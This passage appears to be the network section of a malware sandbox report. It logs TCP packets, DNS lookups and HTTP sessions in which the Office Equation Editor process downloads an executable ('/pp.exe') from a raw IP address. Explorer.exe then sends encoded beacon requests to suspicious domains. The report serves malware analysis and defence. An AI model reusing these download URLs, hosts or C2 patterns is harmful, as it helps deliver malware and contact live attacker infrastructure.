                                                                                                                                                      Nov 20, 2020 20:04:34.079359055 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.079394102 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.079406023 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.079437971 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.079443932 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.079482079 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.079510927 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.079521894 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.079550028 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.079577923 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.080457926 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.290147066 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.290184975 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.290208101 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.290234089 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.290258884 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.290277958 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.290294886 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.290313959 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.290324926 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.290334940 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.290360928 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.290383101 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.290386915 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.290407896 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.290427923 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.290431023 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.290446997 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.290465117 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.290482044 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.290482998 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.290523052 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.290559053 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.292257071 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.297674894 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.297704935 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.297724962 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.297741890 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.297760010 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.297780991 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.297800064 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.297823906 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.297831059 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.297847986 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.297864914 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.297869921 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.297889948 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.297898054 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.297905922 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.297923088 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.297929049 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.297943115 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.297966003 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.297987938 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298011065 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298011065 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.298022032 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.298027992 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.298036098 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298054934 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298073053 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.298077106 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298100948 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298111916 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.298124075 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298146963 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298167944 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298182011 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.298190117 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298191071 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.298213005 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298224926 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.298235893 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298249006 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.298259020 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298281908 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298299074 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298316002 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298320055 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.298337936 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298360109 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298360109 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.298372984 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.298381090 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.298382998 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298407078 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298429966 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298441887 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.298453093 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298456907 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.298477888 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.298477888 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298496962 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298516035 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298538923 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298542976 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.298554897 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.298557997 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.298562050 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.518882990 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.518893957 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.518915892 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.518923998 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.518934011 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.518939972 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.518963099 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.518978119 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.518985987 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519006968 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519009113 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.519027948 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519042969 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.519052982 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519077063 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519098997 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519110918 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.519124031 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519124985 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.519145966 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519170046 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519179106 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.519192934 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519206047 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.519216061 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519241095 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519264936 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519277096 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.519289017 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519289017 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.519310951 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519335032 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519345045 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.519357920 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519382000 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519382000 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.519406080 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519418001 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.519431114 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519455910 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519454956 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.519484997 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519500971 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.519507885 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519526005 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.519526958 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519546986 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519563913 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519583941 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519607067 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519629955 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519651890 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519659996 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.519670010 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519686937 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519700050 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.519702911 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519720078 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519742012 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519768000 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519792080 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519794941 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.519813061 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519834995 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519834995 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.519856930 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519876957 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.519877911 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519900084 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519911051 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.519918919 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519942999 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519965887 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.519989014 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.520006895 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.520006895 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.520018101 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.520030975 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.520046949 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.520056009 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.520077944 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.520087957 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.520100117 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.520122051 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.520140886 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.520153999 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.520165920 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.520167112 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.520190001 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.520207882 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.520210981 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.520235062 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.520241976 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.520257950 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.520279884 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.520299911 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.520302057 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.520313025 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.520324945 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.520351887 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.520354033 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.520373106 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.520382881 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.520394087 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.520415068 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.520420074 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.520437002 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.520458937 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.520471096 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.520483017 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.520497084 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.520504951 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.520530939 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.520539045 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.520555973 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.520580053 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.520580053 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.520605087 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.520615101 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.520644903 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.520658016 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.520708084 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.525518894 CET4916580192.168.2.22103.207.38.170
                                                                                                                                                      Nov 20, 2020 20:04:34.727513075 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.727571964 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.727612019 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:04:34.727652073 CET8049165103.207.38.170192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:06:00.436414003 CET8049166162.0.232.118192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:06:00.436458111 CET8049166162.0.232.118192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:06:00.436533928 CET4916680192.168.2.22162.0.232.118
                                                                                                                                                      Nov 20, 2020 20:06:00.436593056 CET4916680192.168.2.22162.0.232.118
                                                                                                                                                      Nov 20, 2020 20:06:00.436749935 CET4916680192.168.2.22162.0.232.118
                                                                                                                                                      Nov 20, 2020 20:06:00.436938047 CET4916680192.168.2.22162.0.232.118
                                                                                                                                                      Nov 20, 2020 20:06:00.608424902 CET8049166162.0.232.118192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:06:20.804052114 CET4916780192.168.2.22146.148.194.209
                                                                                                                                                      Nov 20, 2020 20:06:20.968270063 CET8049167146.148.194.209192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:06:20.968513012 CET4916780192.168.2.22146.148.194.209
                                                                                                                                                      Nov 20, 2020 20:06:20.968894005 CET4916780192.168.2.22146.148.194.209
                                                                                                                                                      Nov 20, 2020 20:06:21.133110046 CET8049167146.148.194.209192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:06:21.133157969 CET8049167146.148.194.209192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:06:21.133188009 CET8049167146.148.194.209192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:06:21.133414030 CET4916780192.168.2.22146.148.194.209
                                                                                                                                                      Nov 20, 2020 20:06:21.133493900 CET4916780192.168.2.22146.148.194.209
                                                                                                                                                      Nov 20, 2020 20:06:21.142466068 CET8049167146.148.194.209192.168.2.22
                                                                                                                                                      Nov 20, 2020 20:06:21.146563053 CET4916780192.168.2.22146.148.194.209
                                                                                                                                                      Nov 20, 2020 20:06:21.297625065 CET8049167146.148.194.209192.168.2.22

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 20, 2020 20:06:00.028192997 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8
Nov 20, 2020 20:06:00.066521883 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22
Nov 20, 2020 20:06:20.610979080 CET | 53099 | 53 | 192.168.2.22 | 8.8.8.8
Nov 20, 2020 20:06:20.801933050 CET | 53 | 53099 | 8.8.8.8 | 192.168.2.22
Nov 20, 2020 20:06:54.392342091 CET | 52838 | 53 | 192.168.2.22 | 8.8.8.8
Nov 20, 2020 20:06:54.432351112 CET | 53 | 52838 | 8.8.8.8 | 192.168.2.22

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Nov 20, 2020 20:06:00.028192997 CET | 192.168.2.22 | 8.8.8.8 | 0x708c | Standard query (0) | www.auctionpros.club | A (IP address) | IN (0x0001)
Nov 20, 2020 20:06:20.610979080 CET | 192.168.2.22 | 8.8.8.8 | 0xa14d | Standard query (0) | www.sgbanfang.com | A (IP address) | IN (0x0001)
Nov 20, 2020 20:06:54.392342091 CET | 192.168.2.22 | 8.8.8.8 | 0xccff | Standard query (0) | www.opalthemovie.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Nov 20, 2020 20:06:00.066521883 CET | 8.8.8.8 | 192.168.2.22 | 0x708c | No error (0) | www.auctionpros.club | auctionpros.club | | CNAME (Canonical name) | IN (0x0001)
Nov 20, 2020 20:06:00.066521883 CET | 8.8.8.8 | 192.168.2.22 | 0x708c | No error (0) | auctionpros.club | | 162.0.232.118 | A (IP address) | IN (0x0001)
Nov 20, 2020 20:06:20.801933050 CET | 8.8.8.8 | 192.168.2.22 | 0xa14d | No error (0) | www.sgbanfang.com | | 146.148.194.209 | A (IP address) | IN (0x0001)
Nov 20, 2020 20:06:54.432351112 CET | 8.8.8.8 | 192.168.2.22 | 0xccff | Name error (3) | www.opalthemovie.com | none | none | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• 103.207.38.170
• www.auctionpros.club
• www.sgbanfang.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49165 | 103.207.38.170 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp | kBytes transferred | Direction | Data
Nov 20, 2020 20:04:32.756769896 CET | 0 | OUT | GET /pp.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 103.207.38.170
Connection: Keep-Alive
Nov 20, 2020 20:04:32.975847960 CET | 1 | IN | HTTP/1.1 200 OK
Date: Fri, 20 Nov 2020 19:04:32 GMT
Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.7
Last-Modified: Thu, 19 Nov 2020 08:07:19 GMT
ETag: "ada00-5b471378e0ce7"
Accept-Ranges: bytes
Content-Length: 711168
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49166 | 162.0.232.118 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Nov 20, 2020 20:06:00.253843069 CET | 748 | OUT | GET /glt/?7nU0ar=hWCSv9Zuwtl8NadmrOYz8tuCeFQ4j+1tRbDGtAkGbLuNRVgUfRWqhIxsika1FnwxqADVww==&CdL=M2Mpiri HTTP/1.1
Host: www.auctionpros.club
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Nov 20, 2020 20:06:00.436134100 CET | 750 | IN | HTTP/1.1 404 Not Found
Date: Fri, 20 Nov 2020 19:06:00 GMT
Server: Apache
Accept-Ranges: bytes
Transfer-Encoding: chunked
Content-Type: text/html
Connection: close
                                                                                                                                                      Data Ascii: nfo-server address { text-align: left; } footer { text-align: center; margin: 60px 0; } footer a { text-decoration: none; } footer a img {
                                                                                                                                                      Nov 20, 2020 20:06:00.436270952 CET754INData Raw: 67 68 74 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 74 74 6f 6d 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20
                                                                                                                                                      Data Ascii: ght: 0; bottom: 0; margin: 0 10px; } .status-reason { display: inline; } } @media (min-width: 992px) { .additional-info {
                                                                                                                                                      Nov 20, 2020 20:06:00.436325073 CET755INData Raw: 49 67 43 31 4e 62 59 31 56 53 6b 64 65 42 34 76 58 4d 48 30 4b 53 51 56 49 76 51 66 45 52 63 69 4d 70 63 61 46 74 57 34 48 38 69 49 30 67 42 32 4d 7a 66 45 63 56 33 67 42 2b 49 6b 66 44 74 62 79 43 41 54 67 74 48 42 37 6c 33 54 72 4b 55 47 32 79
